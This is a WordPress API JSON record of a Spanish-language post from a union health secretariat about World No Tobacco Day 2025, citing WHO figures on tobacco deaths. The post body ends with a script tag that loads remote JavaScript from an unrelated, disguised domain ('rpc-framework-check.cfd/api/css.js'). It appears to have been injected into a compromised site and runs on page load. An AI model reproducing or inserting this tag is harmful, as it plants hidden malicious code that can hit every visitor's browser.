{"id":18501,"date":"2025-05-31T00:00:00","date_gmt":"2025-05-31T03:00:00","guid":{"rendered":"http:\/\/atsalaplata.org.ar\/web\/?p=18501"},"modified":"2026-02-02T17:04:06","modified_gmt":"2026-02-02T20:04:06","slug":"dia-mundial-sin-tabaco-4","status":"publish","type":"post","link":"http:\/\/atsalaplata.org.ar\/web\/2025\/05\/dia-mundial-sin-tabaco-4\/","title":{"rendered":"D\u00eda Mundial sin Tabaco"},"content":{"rendered":"\n<p>\ud83d\udeadSeg\u00fan la Organizaci\u00f3n Mundial de la Salud (OMS), esta fecha fue establecida por la Asamblea Mundial de la Salud en 1987.<\/p>\n\n\n\n<p>Este 2025, la campa\u00f1a se centrar\u00e1 en revelar las t\u00e1cticas que utilizan las industrias del tabaco y la nicotina para hacer que sus productos nocivos parezcan atractivos.<\/p>\n\n\n\n<p>El objetivo es llamar la atenci\u00f3n mundial hacia la epidemia de tabaquismo y sus efectos letales, teniendo en cuenta que el tabaco es la segunda causa mundial de muerte, tras la hipertensi\u00f3n, y es responsable de la muerte de uno de cada diez adultos.<\/p>\n\n\n\n<p>#d\u00edamundialsintabaco #SanidadAtsaLaPlata #SiempreJuntoAVos<\/p>\n\n\n\n<p><\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>\ud83d\udeadSeg\u00fan la Organizaci\u00f3n Mundial de la Salud (OMS), esta fecha fue establecida por la Asamblea&#8230;<\/p>\n","protected":false},"author":2,"featured_media":18502,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[146,98,147,81,97,85,148],"tags":[],"class_list":["post-18501","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-destacado","category-home","category-novedades","category-salud","category-sec-de-cultura","category-sec-de-prensa","category-ultimas-noticias"],"_links":{"self":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18501","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/comments?post=18501"}],"version-history":[{"count":2,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18501\/revisions"}],"predecessor-version":[{"id":20803,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18501\/revisions\/20803"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media\/18502"}],"wp:attachment":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media?parent=18501"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/categories?post=18501"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/tags?post=18501"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}